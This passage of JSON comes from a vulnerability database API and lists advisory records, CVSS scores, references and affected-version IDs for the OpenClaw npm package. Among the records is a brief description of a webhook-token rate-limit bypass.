                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8883-9w57-vwv6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35652",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35652"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:54:51Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthorized-action-execution-via-callback-dispatch"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8883-9w57-vwv6",
                    "reference_id": "GHSA-8883-9w57-vwv6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8883-9w57-vwv6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35652",
                "GHSA-8883-9w57-vwv6"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r9j7-ya3h-cbda"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90036?format=api",
            "vulnerability_id": "VCID-r9y1-z2ax-z3e2",
            "summary": "Duplicate Advisory: OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mf5g-6r6f-ghhm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35646"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-59xc-5v89-r7pr",
                    "reference_id": "GHSA-59xc-5v89-r7pr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-59xc-5v89-r7pr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
